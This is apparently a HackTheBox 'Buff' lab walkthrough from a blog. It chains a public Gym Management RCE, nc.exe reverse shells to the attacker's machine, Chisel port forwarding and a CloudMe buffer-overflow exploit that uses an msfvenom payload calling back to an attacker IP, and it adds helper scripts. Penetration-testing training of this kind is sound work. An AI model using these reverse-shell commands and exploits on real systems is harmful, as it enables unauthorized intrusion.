HackTheBox — Buff Writeup
Buff is a medium-difficulty, OSCP-like Windows machine on Hack The Box. In this box we get remote code execution using a public exploit, then use Chisel to forward a port from the target to our Kali machine, and finally exploit the CloudMe service using a buffer overflow exploit. This box may be a bit unstable and you might have to revert it, as the BO exploit being run by other users can crash it.
Enumeration
Enumeration is pretty simple: port 8080 is hosting a website running Gym Management Software 1.0.
A quick Google search immediately turns up a Remote Code Execution exploit for it.
The usage is pretty simple and we immediately get a shell as user shaun, and we also find the user flag.
NOTE: This shell is not very useful, as we cannot move around to other folders. Let's send nc.exe to the target and use it to connect back to our Kali machine, which will be more stable. To locate the nc.exe executable on your Kali you can use the locate command (locate nc.exe). Now all we have to do is start a simple HTTP server on our Kali:
python -m SimpleHTTPServer 9999
Now back on our target Windows machine we can use curl or wget to download nc.exe. (I tried using certutil, however weirdly only curl works on this box.)
Finally, start a netcat listener on your Kali (nc -nlvp 8888) and execute nc.exe on the Windows machine:
nc.exe <kali-ip> <kali-port> -e powershell
DO NOTE !!! : Unless you use the -e option it won't work and you won't get a shell. You can also use -e cmd.exe instead.
Once done, you will get a proper shell where you can move around easily, as you can see below :)
Now let's transfer winPEAS to our target using curl once again.
Some interesting finds are that it has a MySQL server listening on local port 3306.
It also has something called CloudMe running on port 8888 internally.
You can also find this manually by running the netstat -an command.
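To show what that netstat output is telling us, here is an added example (not part of the original writeup) that parses lines in the layout Windows `netstat -an` prints and separates ports bound only to loopback (reachable solely from the host itself, which is why a port forward is needed later) from ports exposed on every interface. The sample output is constructed: ports 3306, 8888 and 8080 mirror the services on the box, while the 10.0.0.x addresses are placeholders, not the real target.

```python
"""Classify listening sockets from `netstat -an` output by bind scope."""
import ipaddress
from collections import defaultdict

# Constructed sample output in the layout Windows `netstat -an` prints.
# The loopback-only ports (3306, 8888) mirror the services found on the box;
# the 10.0.0.x addresses are placeholders, not the real target.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING
  TCP    10.0.0.10:8080         10.0.0.20:51234        ESTABLISHED
  TCP    [::]:8080              [::]:0                 LISTENING
  UDP    0.0.0.0:5355           *:*
"""


def split_endpoint(endpoint):
    """Split 'host:port' (IPv4 or bracketed IPv6) into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def parse_listeners(text):
    """Return a list of (proto, host, port) for sockets in LISTENING state."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        # Skips the banner, the header row, blanks and UDP rows (no state column).
        if len(fields) < 4 or fields[0] not in ("TCP", "UDP"):
            continue
        proto, local, _foreign, state = fields[:4]
        if state != "LISTENING":
            continue
        host, port = split_endpoint(local)
        listeners.append((proto, host, port))
    return listeners


def classify_listeners(text):
    """Group listening ports into 'loopback_only' (reachable only from the
    host itself, e.g. through a port forward) and 'all_interfaces' (exposed
    on the network). A port bound on both counts as exposed."""
    scope = defaultdict(set)
    for _proto, host, port in parse_listeners(text):
        if ipaddress.ip_address(host).is_loopback:
            scope["loopback_only"].add(port)
        else:
            scope["all_interfaces"].add(port)
    scope["loopback_only"] -= scope["all_interfaces"]
    return {k: sorted(v) for k, v in scope.items()}


if __name__ == "__main__":
    print(classify_listeners(SAMPLE_NETSTAT))
```

On the constructed sample this reports 3306 and 8888 as loopback-only and 8080 as exposed, which is exactly the picture winPEAS gave above: the web app is reachable from the network, MySQL and CloudMe are not.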
Moreover, in shaun's Downloads folder we find a CloudMe executable.
Running the tasklist /v command shows that CloudMe is running on our target.
Using Google we immediately find a buffer overflow exploit for CloudMe:
https://www.exploit-db.com/exploits/48389
However, if we read through the exploit, we find that it uses port 8888.
This is also confirmed by a Google search.
Since we can only access port 8888 locally on our target, we can use Chisel or Plink to forward the target's port 8888 to our Kali's port 8888,
so that we can access port 8888 locally on our Kali machine. If you want to use Plink you can refer to this writeup (https://bigb0ss.medium.com/htb-buff-writeup-23617ea8127f).
However, Chisel is the preferred and easier-to-use tool.
First we have to find the Chisel release binaries and download one for Linux and one for Windows,
unzip both of them using the gunzip command, and give both of them executable permission using chmod +x.
Now keep the Linux version of Chisel on your Kali and transfer the Windows version to the target as chisel.exe.
PORT FORWARDING USING CHISEL
On your Kali run:
chisel server --reverse --port 9001
DO NOTE that you can use any port number. What this command does is start a Chisel server on our Kali on port 9001.
NOW, on your target Windows machine run:
.\chisel.exe client <kaliIP>:9001 R:8888:localhost:8888
What it does is forward the Windows machine's port 8888 to our Kali's port 8888. The first port after the R: option is that of our Kali and the second port is that of Windows. And as you remember, port 9001 is our Chisel server on Kali, which will remain the same.
To check that the port has been forwarded, run netstat -anlp | grep 8888 on your Kali machine and we can see chisel listening on it.
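To make the forwarding semantics concrete, here is an added example (not Chisel's code and not part of the original writeup) of a minimal TCP relay: it listens on one port, opens a connection to the real service for each client, and copies bytes in both directions. It runs on a single host with a constructed echo server standing in for the loopback-only service, so it collapses Chisel's two halves (the server on Kali and the client tunnelling out from Windows) into one process; the listening side corresponds to the first port in R:8888:localhost:8888 and the target side to the second. The round_trip helper is the programmatic equivalent of the netstat check above: if it gets its bytes back through the relay, the forward works.

```python
"""Single-host TCP relay showing what a Chisel port forward does on the wire:
accept on one address, connect to the real service, copy bytes both ways."""
import socket
import threading


def pump(src, dst):
    """Copy bytes from src to dst until src hits EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_connection(client, target_host, target_port):
    """Bridge one accepted client to the target service, then close both."""
    upstream = socket.create_connection((target_host, target_port))
    back = threading.Thread(target=pump, args=(upstream, client), daemon=True)
    back.start()
    pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def _serve(listen_host, listen_port, on_connection):
    """Bind, listen, and hand every accepted socket to on_connection in a thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                break
            threading.Thread(target=on_connection, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_forwarder(listen_port, target_host, target_port, listen_host="127.0.0.1"):
    """The forwarded port: relay every connection to target_host:target_port.
    Returns the bound port (pass 0 to get an ephemeral one)."""
    return _serve(listen_host, listen_port,
                  lambda conn: relay_connection(conn, target_host, target_port))


def start_echo_server(listen_host="127.0.0.1"):
    """Constructed stand-in for a loopback-only service (like CloudMe on 8888):
    echoes back whatever it receives. Returns the bound port."""
    def handle(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    return _serve(listen_host, 0, handle)


def round_trip(port, payload, host="127.0.0.1"):
    """Connect to host:port, send payload, half-close, and return the reply."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    service_port = start_echo_server()                       # the "internal" service
    fwd_port = start_forwarder(0, "127.0.0.1", service_port)  # the forwarded port
    print(round_trip(fwd_port, b"hello through the forward"))
```

Everything that reaches the forwarded port is simply handed to the service behind it, which is why the CloudMe exploit can be pointed at 127.0.0.1:8888 on Kali unchanged.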
BONUS: You can also try connecting locally to the MySQL server, which our Kali can access on port 3306. If you dig deep into the database you will find that the username is root and the password is blank for our target; however I will not cover it here, you can find many writeups which dig into it. I will go with the intended way, which is port 8888.
In our buffer overflow exploit we need to change the msfvenom payload. I have used this one:
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.5 7777 -e powershell' -b '\x00\x0A\x0D' -f python
(DO NOTE: Here as well I had to use -e powershell OR -e cmd.exe, else it won't work.)
(There is also an alternative, -p windows/shell_reverse_tcp, which you can find in other writeups.)
Once our payload is ready we will paste it into the exploit. Also, in the exploit replace 'payload' with 'buf' (on lines 45 and 47) and you are good to go.
Start a netcat listener on your Kali's port 7777 and run the exploit. It might take a few tries but you will get a shell as admin!
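One check worth doing before pasting the buffer, as an added example that is not part of the original writeup or the exploit: rebuild the bytes from the buf lines that msfvenom -f python prints and confirm none of the bytes excluded with -b '\x00\x0A\x0D' slipped through. The two samples are constructed (made-up byte values, not real shellcode); the dirty one deliberately carries a \x0a so the failure case is visible.

```python
"""Sanity-check a `msfvenom -f python` buffer for bytes excluded with -b."""
import ast
import re

# The bytes excluded with -b '\x00\x0A\x0D': NUL ends a C string copy early,
# and \n / \r get mangled by line-oriented input handling on the target.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed samples in the layout msfvenom prints for -f python. The byte
# values are made up (not real shellcode); SAMPLE_DIRTY adds a line that
# deliberately carries a \x0a to show what a failed check looks like.
SAMPLE_CLEAN = r'''buf =  b""
buf += b"\xd9\xc8\xba\x11\x22\x33\x44\xd9"
buf += b"\x74\x24\xf4\x5b\x31\xc9\xb1\x2e"
'''
SAMPLE_DIRTY = SAMPLE_CLEAN + r'''buf += b"\x8b\x0a\x2c"
'''

# Matches `buf = b"..."` and `buf += b"..."`; the group is the bytes literal.
LINE_RE = re.compile(r'^buf\s*\+?=\s*(b"(?:[^"\\]|\\.)*")\s*$')


def parse_python_buf(text):
    """Rebuild the raw bytes from msfvenom's python-format output lines."""
    out = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out += ast.literal_eval(m.group(1))
    return bytes(out)


def find_bad_chars(payload, bad=BAD_CHARS):
    """Return [(offset, byte_value)] for every forbidden byte in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def check_buffer(text, bad=BAD_CHARS):
    """Parse the buffer and report (length, hits); an empty hit list means
    the buffer is safe to paste into the exploit's `buf` variable."""
    payload = parse_python_buf(text)
    return len(payload), find_bad_chars(payload, bad)


if __name__ == "__main__":
    for name, sample in (("clean", SAMPLE_CLEAN), ("dirty", SAMPLE_DIRTY)):
        length, hits = check_buffer(sample)
        print(f"{name}: {length} bytes, bad bytes at {hits}")
```

If the check reports any hits, regenerate the payload rather than editing bytes by hand; a single stray NUL or newline is the usual reason an otherwise correct exploit "needs a few tries".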
Conclusion
Although tricky and unstable, this was a very informative box when it came to using Chisel and buffer overflows. I hope you learned from my writeup, and make sure to follow me here on Medium for more such OSCP-like writeups.
— ZEUS